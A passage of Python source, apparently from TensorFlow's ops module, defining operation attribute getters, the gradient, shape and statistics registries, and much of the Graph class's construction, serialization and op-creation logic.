if getattr(x.list, f):
if f == "type":
return [dtypes.as_dtype(t) for t in x.list.type]
else:
return list(getattr(x.list, f))
return []
if oneof_value == "type":
return dtypes.as_dtype(x.type)
assert oneof_value in fields, "Unsupported field type in " + str(x)
return getattr(x, oneof_value)
def _get_attr_type(self, name):
"""Returns the `DType` value of the attr of this op with the given `name`."""
try:
dtype_enum = c_api.TF_OperationGetAttrType(self._c_op, name)
return _DTYPES_INTERN_TABLE[dtype_enum]
except errors.InvalidArgumentError as e:
# Convert to ValueError for backwards compatibility.
raise ValueError(str(e))
def _get_attr_bool(self, name):
"""Returns the `bool` value of the attr of this op with the given `name`."""
try:
return c_api.TF_OperationGetAttrBool(self._c_op, name)
except errors.InvalidArgumentError as e:
# Convert to ValueError for backwards compatibility.
raise ValueError(str(e))
def _get_attr_int(self, name):
"""Returns the `int` value of the attr of this op with the given `name`."""
try:
return c_api.TF_OperationGetAttrInt(self._c_op, name)
except errors.InvalidArgumentError as e:
# Convert to ValueError for backwards compatibility.
raise ValueError(str(e))
def run(self, feed_dict=None, session=None):
"""Runs this operation in a `Session`.
Calling this method will execute all preceding operations that
produce the inputs needed for this operation.
*N.B.* Before invoking `Operation.run()`, its graph must have been
launched in a session, and either a default session must be
available, or `session` must be specified explicitly.
Args:
feed_dict: A dictionary that maps `Tensor` objects to feed values. See
`tf.Session.run` for a description of the valid feed values.
session: (Optional.) The `Session` to be used to run to this operation. If
none, the default session will be used.
"""
_run_using_default_session(self, feed_dict, self.graph, session)
_gradient_registry = registry.Registry("gradient")
@tf_export("RegisterGradient")
class RegisterGradient(object):
"""A decorator for registering the gradient function for an op type.
This decorator is only used when defining a new op type. For an op
with `m` inputs and `n` outputs, the gradient function is a function
that takes the original `Operation` and `n` `Tensor` objects
(representing the gradients with respect to each output of the op),
and returns `m` `Tensor` objects (representing the partial gradients
with respect to each input of the op).
For example, assuming that operations of type `"Sub"` take two
inputs `x` and `y`, and return a single output `x - y`, the
following gradient function would be registered:
```python
@tf.RegisterGradient("Sub")
def _sub_grad(unused_op, grad):
return grad, tf.negative(grad)
```
The decorator argument `op_type` is the string type of an
operation. This corresponds to the `OpDef.name` field for the proto
that defines the operation.
"""
def __init__(self, op_type):
"""Creates a new decorator with `op_type` as the Operation type.
Args:
op_type: The string type of an operation. This corresponds to the
`OpDef.name` field for the proto that defines the operation.
Raises:
TypeError: If `op_type` is not string.
"""
if not isinstance(op_type, six.string_types):
raise TypeError("op_type must be a string")
self._op_type = op_type
def __call__(self, f):
"""Registers the function `f` as gradient function for `op_type`."""
_gradient_registry.register(f, self._op_type)
return f
@deprecation.deprecated_endpoints("NotDifferentiable", "NoGradient")
@tf_export("no_gradient", v1=["no_gradient", "NotDifferentiable", "NoGradient"])
def no_gradient(op_type):
"""Specifies that ops of type `op_type` is not differentiable.
This function should *not* be used for operations that have a
well-defined gradient that is not yet implemented.
This function is only used when defining a new op type. It may be
used for ops such as `tf.size()` that are not differentiable. For
example:
```python
tf.no_gradient("Size")
```
The gradient computed for 'op_type' will then propagate zeros.
For ops that have a well-defined gradient but are not yet implemented,
no declaration should be made, and an error *must* be thrown if
an attempt to request its gradient is made.
Args:
op_type: The string type of an operation. This corresponds to the
`OpDef.name` field for the proto that defines the operation.
Raises:
TypeError: If `op_type` is not a string.
"""
if not isinstance(op_type, six.string_types):
raise TypeError("op_type must be a string")
_gradient_registry.register(None, op_type)
# Aliases for the old names, will be eventually removed.
NoGradient = no_gradient
NotDifferentiable = no_gradient
def get_gradient_function(op):
"""Returns the function that computes gradients for "op"."""
if not op.inputs:
return None
try:
op_type = op.get_attr("_gradient_op_type")
except ValueError:
op_type = op.type
return _gradient_registry.lookup(op_type)
_shape_registry = registry.Registry("shape functions")
_default_shape_function_registry = registry.Registry("default shape functions")
# These are set to common_shapes.call_cpp_shape_fn by op generated code
# (generated by python_op_gen.cc).
# It is set outside ops.py to avoid a circular dependency.
_call_cpp_shape_fn = None
_call_cpp_shape_fn_and_require_op = None
def _set_call_cpp_shape_fn(call_cpp_shape_fn):
"""Sets default shape fns from passed common_shapes.call_cpp_shape_fn."""
global _call_cpp_shape_fn, _call_cpp_shape_fn_and_require_op
if _call_cpp_shape_fn:
return # already registered
def call_without_requiring(op):
return call_cpp_shape_fn(op, require_shape_fn=False)
_call_cpp_shape_fn = call_without_requiring
def call_with_requiring(op):
return call_cpp_shape_fn(op, require_shape_fn=True)
_call_cpp_shape_fn_and_require_op = call_with_requiring
class RegisterShape(object):
"""No longer used.
Was: A decorator for registering a shape function.
Shape functions must now be registered via the SetShapeFn on the
original Op specification in C++.
"""
def __init__(self, op_type):
"""Saves the `op_type` as the `Operation` type."""
if not isinstance(op_type, six.string_types):
raise TypeError("op_type must be a string")
self._op_type = op_type
def __call__(self, f):
"""Registers "f" as the shape function for "op_type"."""
if f is None:
assert _call_cpp_shape_fn
# None is a special "weak" value that provides a default shape function,
# and can be overridden by a non-None registration.
try:
_default_shape_function_registry.register(_call_cpp_shape_fn,
self._op_type)
except KeyError:
# Ignore duplicate registrations of the weak value. This can
# occur if the op library input to wrapper generation
# inadvertently links in one or more of the standard op
# libraries.
pass
else:
_shape_registry.register(f, self._op_type)
return f
def set_shape_and_handle_data_for_outputs(_):
"""No op. TODO(b/74620627): Remove this."""
pass
class OpStats(object):
"""A holder for statistics about an operator.
This class holds information about the resource requirements for an op,
including the size of its weight parameters on-disk and how many FLOPS it
requires to execute forward inference.
If you define a new operation, you can create a function that will return a
set of information about its usage of the CPU and disk space when serialized.
The function itself takes a Graph object that's been set up so you can call
methods like get_tensor_by_name to help calculate the results, and a NodeDef
argument.
"""
def __init__(self, statistic_type, value=None):
"""Sets up the initial placeholders for the statistics."""
self.statistic_type = statistic_type
self.value = value
@property
def statistic_type(self):
return self._statistic_type
@statistic_type.setter
def statistic_type(self, statistic_type):
self._statistic_type = statistic_type
@property
def value(self):
return self._value
@value.setter
def value(self, value):
self._value = value
def __iadd__(self, other):
if other.statistic_type != self.statistic_type:
raise ValueError("Can't add an OpStat of type %s to one of %s." %
(self.statistic_type, other.statistic_type))
if self.value is None:
self.value = other.value
elif other.value is not None:
self._value += other.value
return self
_stats_registry = registry.Registry("statistical functions")
class RegisterStatistics(object):
"""A decorator for registering the statistics function for an op type.
This decorator can be defined for an op type so that it gives a
report on the resources used by an instance of an operator, in the
form of an OpStats object.
Well-known types of statistics include these so far:
- flops: When running a graph, the bulk of the computation happens doing
numerical calculations like matrix multiplications. This type allows a node
to return how many floating-point operations it takes to complete. The
total number of FLOPs for a graph is a good guide to its expected latency.
You can add your own statistics just by picking a new type string, registering
functions for the ops you care about, and then calling get_stats_for_node_def.
If a statistic for an op is registered multiple times, a KeyError will be
raised.
Since the statistics is counted on a per-op basis. It is not suitable for
model parameters (capacity), which is expected to be counted only once, even
if it is shared by multiple ops. (e.g. RNN)
For example, you can define a new metric called doohickey for a Foo operation
by placing this in your code:
```python
@ops.RegisterStatistics("Foo", "doohickey")
def _calc_foo_bojangles(unused_graph, unused_node_def):
return ops.OpStats("doohickey", 20)
```
Then in client code you can retrieve the value by making this call:
```python
doohickey = ops.get_stats_for_node_def(graph, node_def, "doohickey")
```
If the NodeDef is for an op with a registered doohickey function, you'll get
back the calculated amount in doohickey.value, or None if it's not defined.
"""
def __init__(self, op_type, statistic_type):
"""Saves the `op_type` as the `Operation` type."""
if not isinstance(op_type, six.string_types):
raise TypeError("op_type must be a string.")
if "," in op_type:
raise TypeError("op_type must not contain a comma.")
self._op_type = op_type
if not isinstance(statistic_type, six.string_types):
raise TypeError("statistic_type must be a string.")
if "," in statistic_type:
raise TypeError("statistic_type must not contain a comma.")
self._statistic_type = statistic_type
def __call__(self, f):
"""Registers "f" as the statistics function for "op_type"."""
_stats_registry.register(f, self._op_type + "," + self._statistic_type)
return f
def get_stats_for_node_def(graph, node, statistic_type):
"""Looks up the node's statistics function in the registry and calls it.
This function takes a Graph object and a NodeDef from a GraphDef, and if
there's an associated statistics method, calls it and returns a result. If no
function has been registered for the particular node type, it returns an empty
statistics object.
Args:
graph: A Graph object that's been set up with the node's graph.
node: A NodeDef describing the operator.
statistic_type: A string identifying the statistic we're interested in.
Returns:
An OpStats object containing information about resource usage.
"""
try:
stats_func = _stats_registry.lookup(node.op + "," + statistic_type)
result = stats_func(graph, node)
except LookupError:
result = OpStats(statistic_type)
return result
def name_from_scope_name(name):
"""Returns the name of an op given the name of its scope.
Args:
name: the name of the scope.
Returns:
the name of the op (equal to scope name minus any trailing slash).
"""
return name[:-1] if (name and name[-1] == "/") else name
_MUTATION_LOCK_GROUP = 0
_SESSION_RUN_LOCK_GROUP = 1
@tf_export("Graph")
class Graph(object):
"""A TensorFlow computation, represented as a dataflow graph.
A `Graph` contains a set of
`tf.Operation` objects,
which represent units of computation; and
`tf.Tensor` objects, which represent
the units of data that flow between operations.
A default `Graph` is always registered, and accessible by calling
`tf.compat.v1.get_default_graph`.
To add an operation to the default graph, simply call one of the functions
that defines a new `Operation`:
```python
c = tf.constant(4.0)
assert c.graph is tf.compat.v1.get_default_graph()
```
Another typical usage involves the
`tf.Graph.as_default`
context manager, which overrides the current default graph for the
lifetime of the context:
```python
g = tf.Graph()
with g.as_default():
# Define operations and tensors in `g`.
c = tf.constant(30.0)
assert c.graph is g
```
Important note: This class *is not* thread-safe for graph construction. All
operations should be created from a single thread, or external
synchronization must be provided. Unless otherwise specified, all methods
are not thread-safe.
A `Graph` instance supports an arbitrary number of "collections"
that are identified by name. For convenience when building a large
graph, collections can store groups of related objects: for
example, the `tf.Variable` uses a collection (named
`tf.GraphKeys.GLOBAL_VARIABLES`) for
all variables that are created during the construction of a graph. The caller
may define additional collections by specifying a new name.
"""
def __init__(self):
"""Creates a new, empty Graph."""
# Protects core state that can be returned via public accessors.
# Thread-safety is provided on a best-effort basis to support buggy
# programs, and is not guaranteed by the public `tf.Graph` API.
#
# NOTE(mrry): This does not protect the various stacks. A warning will
# be reported if these are used from multiple threads
self._lock = threading.RLock()
# The group lock synchronizes Session.run calls with methods that create
# and mutate ops (e.g. Graph.create_op()). This synchronization is
# necessary because it's illegal to modify an operation after it's been run.
# The group lock allows any number of threads to mutate ops at the same time
# but if any modification is going on, all Session.run calls have to wait.
# Similarly, if one or more Session.run calls are going on, all mutate ops
# have to wait until all Session.run calls have finished.
self._group_lock = lock_util.GroupLock(num_groups=2)
self._nodes_by_id = {} # GUARDED_BY(self._lock)
self._next_id_counter = 0 # GUARDED_BY(self._lock)
self._nodes_by_name = {} # GUARDED_BY(self._lock)
self._version = 0 # GUARDED_BY(self._lock)
# Maps a name used in the graph to the next id to use for that name.
self._names_in_use = {}
self._stack_state_is_thread_local = False
self._thread_local = threading.local()
# Functions that will be applied to choose a device if none is specified.
# In TF2.x or after switch_to_thread_local(),
# self._thread_local._device_function_stack is used instead.
self._graph_device_function_stack = traceable_stack.TraceableStack()
# Default original_op applied to new ops.
self._default_original_op = None
# Current control flow context. It could be either CondContext or
# WhileContext defined in ops/control_flow_ops.py
self._control_flow_context = None
# A new node will depend of the union of all of the nodes in the stack.
# In TF2.x or after switch_to_thread_local(),
# self._thread_local._control_dependencies_stack is used instead.
self._graph_control_dependencies_stack = []
# Arbitrary collections of objects.
self._collections = {}
# The graph-level random seed
self._seed = None
# A dictionary of attributes that should be applied to all ops.
self._attr_scope_map = {}
# A map from op type to the kernel label that should be used.
self._op_to_kernel_label_map = {}
# A map from op type to an alternative op type that should be used when
# computing gradients.
self._gradient_override_map = {}
# True if the graph is considered "finalized". In that case no
# new operations can be added.
self._finalized = False
# Functions defined in the graph
self._functions = collections.OrderedDict()
# Default GraphDef versions
self._graph_def_versions = versions_pb2.VersionDef(
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER)
self._building_function = False
# Stack of colocate_with ops. In TF2.x or after switch_to_thread_local(),
# self._thread_local._colocation_stack is used instead.
self._graph_colocation_stack = traceable_stack.TraceableStack()
# Set of tensors that are dangerous to feed!
self._unfeedable_tensors = object_identity.ObjectIdentitySet()
# Set of operations that are dangerous to fetch!
self._unfetchable_ops = set()
# A map of tensor handle placeholder to tensor dtype.
self._handle_feeders = {}
# A map from tensor handle to its read op.
self._handle_readers = {}
# A map from tensor handle to its move op.
self._handle_movers = {}
# A map from tensor handle to its delete op.
self._handle_deleters = {}
# Allow optimizers and other objects to pseudo-uniquely key graphs (this key
# will be shared when defining function graphs, for example, so optimizers
# being called inside function definitions behave as if they were seeing the
# actual outside graph).
self._graph_key = "grap-key-%d/" % (uid(),)
# A string with the last reduction method passed to
# losses.compute_weighted_loss(), or None. This is required only for
# backward compatibility with Estimator and optimizer V1 use cases.
self._last_loss_reduction = None
# Flag that is used to indicate whether loss has been scaled by optimizer.
# If this flag has been set, then estimator uses it to scale losss back
# before reporting. This is required only for backward compatibility with
# Estimator and optimizer V1 use cases.
self._is_loss_scaled_by_optimizer = False
self._container = ""
self._registered_ops = op_def_registry.get_registered_ops()
# Set to True if this graph is being built in an
# AutomaticControlDependencies context.
self._add_control_dependencies = False
# Cache for OpDef protobufs retrieved via the C API.
self._op_def_cache = {}
# Cache for constant results of `broadcast_gradient_args()`. The keys are
# tuples of fully-defined shapes: (x_shape_tuple, y_shape_tuple), and the
# values are tuples of reduction indices: (rx, ry).
self._bcast_grad_args_cache = {}
# Cache for constant results of `reduced_shape()`. The keys are pairs of
# tuples: (input_shape_tuple, reduction_indices_tuple), and the values
# are pairs of tuples: (output_shape_kept_dims, tile_scaling).
self._reduced_shape_cache = {}
# TODO(skyewm): fold as much of the above as possible into the C
# implementation
self._scoped_c_graph = c_api_util.ScopedTFGraph()
# The C API requires all ops to have shape functions. Disable this
# requirement (many custom ops do not have shape functions, and we don't
# want to break these existing cases).
c_api.SetRequireShapeInferenceFns(self._c_graph, False)
if tf2.enabled():
self.switch_to_thread_local()
# Note: this method is private because the API of tf.Graph() is public and
# frozen, and this functionality is still not ready for public visibility.
@tf_contextlib.contextmanager
def _variable_creator_scope(self, creator, priority=100):
"""Scope which defines a variable creation function.
Args:
creator: A callable taking `next_creator` and `kwargs`. See the
`tf.variable_creator_scope` docstring.
priority: Creators with a higher `priority` are called first. Within the
same priority, creators are called inner-to-outer.
Yields:
`_variable_creator_scope` is a context manager with a side effect, but
doesn't return a value.
Raises:
RuntimeError: If variable creator scopes are not properly nested.
"""
# This step keeps a reference to the existing stack, and it also initializes
# self._thread_local._variable_creator_stack if it doesn't exist yet.
old = self._variable_creator_stack
new = list(old)
new.append((priority, creator))
# Sorting is stable, so we'll put higher-priority creators later in the list
# but otherwise maintain registration order.
new.sort(key=lambda item: item[0])
self._thread_local._variable_creator_stack = new # pylint: disable=protected-access
try:
yield
finally:
if self._thread_local._variable_creator_stack is not new: # pylint: disable=protected-access
raise RuntimeError(
"Exiting variable_creator_scope without proper nesting.")
self._thread_local._variable_creator_stack = old # pylint: disable=protected-access
# Note: this method is private because the API of tf.Graph() is public and
# frozen, and this functionality is still not ready for public visibility.
@property
def _variable_creator_stack(self):
if not hasattr(self._thread_local, "_variable_creator_stack"):
self._thread_local._variable_creator_stack = [] # pylint: disable=protected-access
# This previously returned a copy of the stack instead of the stack itself,
# to guard against accidental mutation. Consider, however, code that wants
# to save and restore the variable creator stack:
# def f():
# original_stack = graph._variable_creator_stack
# graph._variable_creator_stack = new_stack
# ... # Some code
# graph._variable_creator_stack = original_stack
#
# And lets say you have some code that calls this function with some
# variable_creator:
# def g():
# with variable_scope.variable_creator_scope(creator):
# f()
# When exiting the variable creator scope, it would see a different stack
# object than it expected leading to a "Exiting variable_creator_scope
# without proper nesting" error.
return self._thread_local._variable_creator_stack # pylint: disable=protected-access
@_variable_creator_stack.setter
def _variable_creator_stack(self, variable_creator_stack):
self._thread_local._variable_creator_stack = variable_creator_stack # pylint: disable=protected-access
def _check_not_finalized(self):
"""Check if the graph is finalized.
Raises:
RuntimeError: If the graph finalized.
"""
if self._finalized:
raise RuntimeError("Graph is finalized and cannot be modified.")
def _add_op(self, op, op_id, op_name):
"""Adds 'op' to the graph.
Args:
op: the Operation to add.
op_id: the ID of the Operation.
op_name: the name of the Operation.
"""
self._check_not_finalized()
with self._lock:
self._nodes_by_id[op_id] = op
self._nodes_by_name[op_name] = op
self._version = max(self._version, op_id)
@property
def _c_graph(self):
if self._scoped_c_graph:
return self._scoped_c_graph.graph
return None
@property
def version(self):
"""Returns a version number that increases as ops are added to the graph.
Note that this is unrelated to the
`tf.Graph.graph_def_versions`.
Returns:
An integer version that increases as ops are added to the graph.
"""
if self._finalized:
return self._version
with self._lock:
return self._version
@property
def graph_def_versions(self):
# pylint: disable=line-too-long
"""The GraphDef version information of this graph.
For details on the meaning of each version, see
[`GraphDef`](https://www.tensorflow.org/code/tensorflow/core/framework/graph.proto).
Returns:
A `VersionDef`.
"""
# pylint: enable=line-too-long
with c_api_util.tf_buffer() as buf:
c_api.TF_GraphVersions(self._c_graph, buf)
data = c_api.TF_GetBuffer(buf)
version_def = versions_pb2.VersionDef()
version_def.ParseFromString(compat.as_bytes(data))
return version_def
@property
def seed(self):
"""The graph-level random seed of this graph."""
return self._seed
@seed.setter
def seed(self, seed):
self._seed = seed
@property
def finalized(self):
"""True if this graph has been finalized."""
return self._finalized
def finalize(self):
"""Finalizes this graph, making it read-only.
After calling `g.finalize()`, no new operations can be added to
`g`. This method is used to ensure that no operations are added
to a graph when it is shared between multiple threads, for example
when using a `tf.compat.v1.train.QueueRunner`.
"""
self._finalized = True
def _unsafe_unfinalize(self):
"""Opposite of `finalize`.
Internal interface.
NOTE: Unfinalizing a graph could have negative impact on performance,
especially in a multi-threaded environment. Unfinalizing a graph
when it is in use by a Session may lead to undefined behavior. Ensure
that all sessions using a graph are closed before calling this method.
"""
self._finalized = False
def _get_control_flow_context(self):
"""Returns the current control flow context.
Returns:
A context object.
"""
return self._control_flow_context
def _set_control_flow_context(self, ctx):
"""Sets the current control flow context.
Args:
ctx: a context object.
"""
self._control_flow_context = ctx
def _copy_functions_to_graph_def(self, graph_def, starting_bytesize):
"""If this graph contains functions, copy them to `graph_def`."""
bytesize = starting_bytesize
for f in self._functions.values():
bytesize += f.definition.ByteSize()
if bytesize >= (1 << 31) or bytesize < 0:
raise ValueError("GraphDef cannot be larger than 2GB.")
graph_def.library.function.extend([f.definition])
if f.grad_func_name:
grad_def = function_pb2.GradientDef()
grad_def.function_name = f.name
grad_def.gradient_func = f.grad_func_name
graph_def.library.gradient.extend([grad_def])
def _as_graph_def(self, from_version=None, add_shapes=False):
# pylint: disable=line-too-long
"""Returns a serialized `GraphDef` representation of this graph.
The serialized `GraphDef` can be imported into another `Graph`
(using `tf.import_graph_def`) or used with the
[C++ Session API](../../../../api_docs/cc/index.md).
This method is thread-safe.
Args:
from_version: Optional. If this is set, returns a `GraphDef` containing
only the nodes that were added to this graph since its `version`
property had the given value.
add_shapes: If true, adds an "_output_shapes" list attr to each node with
the inferred shapes of each of its outputs.
Returns:
A tuple containing a
[`GraphDef`](https://www.tensorflow.org/code/tensorflow/core/framework/graph.proto)
protocol buffer, and the version of the graph to which that
`GraphDef` corresponds.
Raises:
ValueError: If the `graph_def` would be too large.
"""
# pylint: enable=line-too-long
with self._lock:
with c_api_util.tf_buffer() as buf:
c_api.TF_GraphToGraphDef(self._c_graph, buf)
data = c_api.TF_GetBuffer(buf)
graph = graph_pb2.GraphDef()
graph.ParseFromString(compat.as_bytes(data))
# Strip the experimental library field iff it's empty.
if not graph.library.function:
graph.ClearField("library")
if add_shapes:
for node in graph.node:
op = self._nodes_by_name[node.name]
if op.outputs:
node.attr["_output_shapes"].list.shape.extend(
[output.get_shape().as_proto() for output in op.outputs])
for function_def in graph.library.function:
defined_function = self._functions[function_def.signature.name]
try:
func_graph = defined_function.graph
except AttributeError:
# _DefinedFunction doesn't have a graph, _EagerDefinedFunction
# does. Both rely on ops.py, so we can't really isinstance check
# them.
continue
input_shapes = function_def.attr["_input_shapes"]
try:
func_graph_inputs = func_graph.inputs
except AttributeError:
continue
for input_tensor in func_graph_inputs:
if input_tensor.dtype == dtypes.resource:
# TODO(allenl): Save and restore handle data, then save the
# resource placeholder's shape. Right now some shape functions get
# confused if we set the shape of the resource placeholder (to a
# scalar of course) and there isn't any handle data.
input_shapes.list.shape.add().CopyFrom(
tensor_shape.TensorShape(None).as_proto())
else:
input_shapes.list.shape.add().CopyFrom(
input_tensor.get_shape().as_proto())
for node in function_def.node_def:
try:
op = func_graph.get_operation_by_name(node.name)
except KeyError:
continue
node.attr["_output_shapes"].list.shape.extend(
[output.get_shape().as_proto() for output in op.outputs])
return graph, self._version
def as_graph_def(self, from_version=None, add_shapes=False):
# pylint: disable=line-too-long
"""Returns a serialized `GraphDef` representation of this graph.
The serialized `GraphDef` can be imported into another `Graph`
(using `tf.import_graph_def`) or used with the
[C++ Session API](../../api_docs/cc/index.md).
This method is thread-safe.
Args:
from_version: Optional. If this is set, returns a `GraphDef` containing
only the nodes that were added to this graph since its `version`
property had the given value.
add_shapes: If true, adds an "_output_shapes" list attr to each node with
the inferred shapes of each of its outputs.
Returns:
A
[`GraphDef`](https://www.tensorflow.org/code/tensorflow/core/framework/graph.proto)
protocol buffer.
Raises:
ValueError: If the `graph_def` would be too large.
"""
# pylint: enable=line-too-long
result, _ = self._as_graph_def(from_version, add_shapes)
return result
def _is_function(self, name):
"""Tests whether 'name' is registered in this graph's function library.
Args:
name: string op name.
Returns:
bool indicating whether or not 'name' is registered in function library.
"""
return compat.as_str(name) in self._functions
def _get_function(self, name):
"""Returns the function definition for 'name'.
Args:
name: string function name.
Returns:
The function def proto.
"""
return self._functions.get(compat.as_str(name), None)
def _add_function(self, function):
"""Adds a function to the graph.
After the function has been added, you can call to the function by
passing the function name in place of an op name to
`Graph.create_op()`.
Args:
function: A `_DefinedFunction` object.
Raises:
ValueError: if another function is defined with the same name.
"""
name = function.name
# Sanity checks on gradient definition.
if (function.grad_func_name is not None) and (function.python_grad_func is
not None):
raise ValueError("Gradient defined twice for function %s" % name)
# Add function to graph
# pylint: disable=protected-access
gradient = (
function._grad_func._c_func.func if function._grad_func else None)
c_api.TF_GraphCopyFunction(self._c_graph, function._c_func.func, gradient)
# pylint: enable=protected-access
self._functions[compat.as_str(name)] = function
# Need a new-enough consumer to support the functions we add to the graph.
if self._graph_def_versions.min_consumer < 12:
self._graph_def_versions.min_consumer = 12
@property
def building_function(self):
"""Returns True iff this graph represents a function."""
return self._building_function
# Helper functions to create operations.
@deprecated_args(None,
"Shapes are always computed; don't use the compute_shapes "
"as it has no effect.", "compute_shapes")
def create_op(
self,
op_type,
inputs,
dtypes=None, # pylint: disable=redefined-outer-name
input_types=None,
name=None,
attrs=None,
op_def=None,
compute_shapes=True,
compute_device=True):
"""Creates an `Operation` in this graph.
This is a low-level interface for creating an `Operation`. Most
programs will not call this method directly, and instead use the
Python op constructors, such as `tf.constant()`, which add ops to
the default graph.
Args:
op_type: The `Operation` type to create. This corresponds to the
`OpDef.name` field for the proto that defines the operation.
inputs: A list of `Tensor` objects that will be inputs to the `Operation`.
dtypes: (Optional) A list of `DType` objects that will be the types of the
tensors that the operation produces.
input_types: (Optional.) A list of `DType`s that will be the types of the
tensors that the operation consumes. By default, uses the base `DType`
of each input in `inputs`. Operations that expect reference-typed inputs
must specify `input_types` explicitly.
name: (Optional.) A string name for the operation. If not specified, a
name is generated based on `op_type`.
attrs: (Optional.) A dictionary where the key is the attribute name (a
string) and the value is the respective `attr` attribute of the
`NodeDef` proto that will represent the operation (an `AttrValue`
proto).
op_def: (Optional.) The `OpDef` proto that describes the `op_type` that
the operation will have.
compute_shapes: (Optional.) Deprecated. Has no effect (shapes are always
computed).
compute_device: (Optional.) If True, device functions will be executed to
compute the device property of the Operation.
Raises:
TypeError: if any of the inputs is not a `Tensor`.
ValueError: if colocation conflicts with existing device assignment.
Returns:
An `Operation` object.
"""
del compute_shapes
for idx, a in enumerate(inputs):
if not isinstance(a, Tensor):
raise TypeError("Input #%d is not a tensor: %s" % (idx, a))
return self._create_op_internal(op_type, inputs, dtypes, input_types, name,
attrs, op_def, compute_device)
def _create_op_internal(
self,
op_type,
inputs,
dtypes=None, # pylint: disable=redefined-outer-name
input_types=None,
name=None,
attrs=None,
op_def=None,
compute_device=True):
"""Creates an `Operation` in this graph.
Implements `Graph.create_op()` without the overhead of the deprecation
wrapper.
Args:
op_type: The `Operation` type to create. This corresponds to the
`OpDef.name` field for the proto that defines the operation.
inputs: A list of `Tensor` objects that will be inputs to the `Operation`.
dtypes: (Optional) A list of `DType` objects that will be the types of the
tensors that the operation produces.
input_types: (Optional.) A list of `DType`s that will be the types of the
tensors that the operation consumes. By default, uses the base `DType`
of each input in `inputs`. Operations that expect reference-typed inputs
must specify `input_types` explicitly.
name: (Optional.) A string name for the operation. If not specified, a
name is generated based on `op_type`.
attrs: (Optional.) A dictionary where the key is the attribute name (a
string) and the value is the respective `attr` attribute of the
`NodeDef` proto that will represent the operation (an `AttrValue`
proto).
op_def: (Optional.) The `OpDef` proto that describes the `op_type` that
the operation will have.
compute_device: (Optional.) If True, device functions will be executed to
compute the device property of the Operation.
Raises:
ValueError: if colocation conflicts with existing device assignment.
Returns:
An `Operation` object.
"""
self._check_not_finalized()
if name is None:
name = op_type
# If a names ends with a '/' it is a "name scope" and we use it as-is,
# after removing the trailing '/'.
if name and name[-1] == "/":
name = name_from_scope_name(name)
else:
name = self.unique_name(name)
node_def = _NodeDef(op_type, name, attrs)
input_ops = set([t.op for t in inputs])
control_inputs = self._control_dependencies_for_inputs(input_ops)
# _create_op_helper mutates the new Operation. `_mutation_lock` ensures a
# Session.run call cannot occur between creating and mutating the op.
with self._mutation_lock():
ret = Operation(
node_def,
self,
inputs=inputs,
output_types=dtypes,
control_inputs=control_inputs,
input_types=input_types,
original_op=self._default_original_op,
op_def=op_def)
self._create_op_helper(ret, compute_device=compute_device)
return ret
def _create_op_from_tf_operation(self, c_op, compute_device=True):
"""Creates an `Operation` in this graph from the supplied TF_Operation.
This method is like create_op() except the new Operation is constructed
using `c_op`. The returned Operation will have `c_op` as its _c_op
field. This is used to create Operation objects around TF_Operations created
indirectly by the C API (e.g. by TF_ImportGraphDef, TF_FinishWhile).
This function does not call Operation._control_flow_post_processing or
Graph._control_dependencies_for_inputs (since the inputs may not be
available yet). The caller is responsible for calling these methods.
Args:
c_op: a wrapped TF_Operation
compute_device: (Optional.) If True, device functions will be executed to
compute the device property of the Operation.
Returns:
An `Operation` object.
"""
self._check_not_finalized()
ret = Operation(c_op, self)
# If a name_scope was created with ret.name but no nodes were created in it,
# the name will still appear in _names_in_use even though the name hasn't
# been used. This is ok, just leave _names_in_use as-is in this case.
# TODO(skyewm): make the C API guarantee no name conflicts.
name_key = ret.name.lower()
if name_key not in self._names_in_use:
self._names_in_use[name_key] = 1
self._create_op_helper(ret, compute_device=compute_device)
return ret
def _create_op_helper(self, op, compute_device=True):
"""Common logic for creating an op in this graph."""
# Apply any additional attributes requested. Do not overwrite any existing
# attributes.
for key, value in self._attr_scope_map.items():
try:
op.get_attr(key)
except ValueError:
if callable(value):
value = value(op.node_def)
if not isinstance(value, (type(None), attr_value_pb2.AttrValue)):
raise TypeError(
"Callable for scope map key '%s' must return either None or "
"an AttrValue protocol buffer; but it returned: %s" %
(key, value))
if value:
op._set_attr(key, value) # pylint: disable=protected-access
# Apply a kernel label if one has been specified for this op type.
try:
kernel_label = self._op_to_kernel_label_map[op.type]
op._set_attr("_kernel", # pylint: disable=protected-access
attr_value_pb2.AttrValue(s=compat.as_bytes(kernel_label)))
except KeyError:
pass
# Apply the overriding op type for gradients if one has been specified for
# this op type.
try:
mapped_op_type = self._gradient_override_map[op.type]
op._set_attr("_gradient_op_type", # pylint: disable=protected-access
attr_value_pb2.AttrValue(s=compat.as_bytes(mapped_op_type)))
except KeyError:
pass
self._record_op_seen_by_control_dependencies(op)
if compute_device:
self._apply_device_functions(op)
# Snapshot the colocation stack metadata before we might generate error
# messages using it. Note that this snapshot depends on the actual stack
# and is independent of the op's _class attribute.
# pylint: disable=protected-access
op._colocation_code_locations = self._snapshot_colocation_stack_metadata()
# pylint: enable=protected-access
if self._colocation_stack:
all_colocation_groups = []
for colocation_op in self._colocation_stack.peek_objs():
all_colocation_groups.extend(colocation_op.colocation_groups())
if colocation_op.device:
# pylint: disable=protected-access
op._set_device(colocation_op.device)
# pylint: enable=protected-access
all_colocation_groups = sorted(set(all_colocation_groups))
# pylint: disable=protected-access
op._set_attr(
"_class",
attr_value_pb2.AttrValue(
list=attr_value_pb2.AttrValue.ListValue(s=all_colocation_groups)))
# pylint: enable=protected-access
# Sets "container" attribute if
# (1) self._container is not None
# (2) "is_stateful" is set in OpDef
# (3) "container" attribute is in OpDef
# (4) "container" attribute is None
if self._container and op._is_stateful: # pylint: disable=protected-access
try:
container_attr = op.get_attr("container")
except ValueError:
# "container" attribute is not in OpDef
pass
else:
if not container_attr:
op._set_attr("container", attr_value_pb2.AttrValue( # pylint: disable=protected-access
s=compat.as_bytes(self._container)))
def _add_new_tf_operations(self, compute_devices=True):
"""Creates `Operations` in this graph for any new TF_Operations.
This is useful for when TF_Operations are indirectly created by the C API
outside of the Operation constructor (e.g. by TF_ImportGraphDef,
TF_FinishWhile). This ensures there are corresponding Operations for all
TF_Operations in the underlying TF_Graph.
Args:
compute_devices: (Optional.) If True, device functions will be executed to
compute the device properties of each new Operation.
Returns:
A list of the new `Operation` objects.
"""
# Create all Operation objects before accessing their inputs since an op may
# be created before its inputs.
new_ops = [
self._create_op_from_tf_operation(c_op, compute_device=compute_devices)
for c_op in c_api_util.new_tf_operations(self)
]
# pylint: disable=protected-access
for op in new_ops:
